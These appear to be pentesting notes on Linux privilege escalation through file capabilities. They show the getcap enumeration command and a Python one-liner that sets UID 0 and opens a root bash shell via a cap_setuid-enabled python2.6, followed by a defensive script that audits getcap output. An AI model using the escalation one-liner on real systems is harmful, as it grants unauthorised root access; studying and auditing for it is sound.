Linux Privilege Escalation using Capabilities - https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/
SUID vs Capabilities - https://mn3m.info/posts/suid-vs-capabilities/
Linux Capabilities Privilege Escalation - https://medium.com/@int0x33/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099
Similar to the SUID/s bit, but it doesn't show up in a find for SUID files.
To check:
getcap -r / 2>/dev/null
The +ep suffix means the listed capabilities are permitted and effective, i.e. fully usable by the binary (the letters stand for effective and permitted).
Since the capability is set on python, we can just run Python code that sets our UID to root and opens bash:
import os; os.setuid(0); os.system("/bin/bash")
Run it using the vulnerable python:
/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
and we get root!
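As an added audit example (not from the original notes or the linked posts), this parses the getcap -r output from the check above and flags the entries a reviewer should look at: an empty name list before the flags (=ep) means the full capability set, cap_setuid is what the os.setuid(0) step relies on, and a capability on an interpreter applies to every script it runs. The sample output lines and the interpreter list are constructed assumptions.

```python
import re

# Constructed sample of `getcap -r / 2>/dev/null` output (not captured from a
# real host). The last line uses the newer libcap print format.
SAMPLE_GETCAP_OUTPUT = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python2.6 = cap_setuid+ep
/usr/sbin/suexec =ep
/usr/bin/mtr-packet cap_net_raw=ep
"""

# Capability that allows changing the process UID (what os.setuid(0) needs).
UID_CAPS = {"cap_setuid"}
# Assumed interpreter names: a capability on one applies to any script it runs.
INTERPRETERS = ("python", "perl", "ruby", "php", "node")

# Matches "=cap_setuid+ep", "=ep" (empty name list) and "cap_net_raw=ep".
_CAPSET_RE = re.compile(r"=?([a-z0-9_,]*)[+=]([eip]+)")


def parse_getcap_line(line):
    """Return {'path', 'caps', 'flags', 'all_caps'} or None for non-matching lines."""
    parts = line.split()
    if len(parts) < 2:
        return None
    path, spec = parts[0], "".join(parts[1:])
    m = _CAPSET_RE.fullmatch(spec)
    if not m:
        return None
    caps = [c for c in m.group(1).split(",") if c]
    # No names before the flags ("=ep") means the full capability set.
    return {"path": path, "caps": caps, "flags": m.group(2), "all_caps": not caps}


def audit_getcap_output(text):
    """Return the entries worth reviewing, each with the reasons it was flagged."""
    findings = []
    for line in text.splitlines():
        entry = parse_getcap_line(line)
        if entry is None:
            continue
        reasons = []
        if entry["all_caps"]:
            reasons.append("full capability set granted")
        if UID_CAPS & set(entry["caps"]):
            reasons.append("can change UID (cap_setuid)")
        if entry["path"].rsplit("/", 1)[-1].startswith(INTERPRETERS):
            reasons.append("capability on a script interpreter")
        if reasons:
            findings.append({**entry, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_getcap_output(SAMPLE_GETCAP_OUTPUT):
        print(f["path"], f["flags"], "; ".join(f["reasons"]))
```

Pipe real getcap output into audit_getcap_output to review a host; ping with only cap_net_raw is not flagged, while python2.6 and the =ep entry are.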